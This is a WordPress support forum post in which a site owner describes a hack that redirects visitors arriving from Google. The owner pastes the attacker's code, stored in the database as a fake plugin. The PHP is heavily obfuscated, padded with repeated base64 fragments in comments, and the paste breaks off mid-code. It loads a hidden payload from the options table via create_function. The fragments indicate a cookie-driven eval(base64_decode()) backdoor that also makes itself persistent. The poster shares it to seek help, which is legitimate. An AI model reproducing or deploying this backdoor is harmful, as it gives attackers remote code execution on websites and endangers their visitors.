WordPress.org

Support

Support » How-To and Troubleshooting » [Resolved] I was hacked

[Resolved] I was hacked

  • Hello,

    From the sunday, I’ve hacked by an unknowed. The hacker add a malicoious script when a visitors arrive from google, the script send them to another search page, with the same string that the user wants to find in Google.

    The hacker add this malicious code to an image of my weblog -an image of a post blog- and the hacker add the image to work like a plugin in the MySQL database.

    Here is the code of the image transformated in plugin:

    <?php /*?#?#,,sess,GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3RpdGFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3RpdGFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd */global $wpdb;/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd */$trp_rss=$wpdb->get_var/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd */(/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd*/"SELECT option_value FROM $wpdb->options WHERE option_name='rss_f541b3abd05e7962fcab37737f40fad8'"/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd*/); /* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd*/ preg_match/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd*/(/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd*/"!events or a cale\"\;s\:7\:\'(.*?)\'!is",$trp_rss,$trp_m/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd*/);/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3RpdGFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd*/ $trp_f=create_function/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    Nzc3KTsNCkBjaG1vZCgkdG1
    X3NoZ
    xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
    X3NoZ
    xsLDA1NTUpO
    0Ka
    YoJGFjdD09InRtcCIpIEBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
    b3MoJHRtcF9zaGVsbC
    iLyIpKS
    
    NTU1KTsNCiRsYz0i
    0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
    0KC
    VjaG8oIj
    hLS0gZXggLS0
    Iik7DQoJJGxpbj1
    cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
    gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
    4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
    0KfQ0KJGZmd
    5jdHh0PSckcD0iJy4kdG1
    X3NoZ
    xsLiciO
    0KJGE9Z2V0X29
    dGlvbigiY
    N0aXZlX3Bsd
    dpbnMiKTsNCiRiP
    ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
    kcCkhPT1mY
    xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
    109JHA7IHV
    ZGF0ZV9vcHRpb24oImFjdGl2ZV9
    bHVna
    5zIi
    kYSk7IH0nO
    0KJGZmd
    5jP
    NyZ
    F0ZV9md
    5jdGlvbignJy
    kZmZ1bmN0eHQpO
    0KY
    RkX2FjdGlvbigidXBkYXRlX29
    dGlvbl9hY3Rpd*/(/* GFjdD0i
    0FDVElPTl0iOyAkdG1
    X3NoZ
    xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
    KTsNCkBjaG1vZChzd
    JzdHIoJHRtcF9zaGVsbC
    
    LHN0cnJ
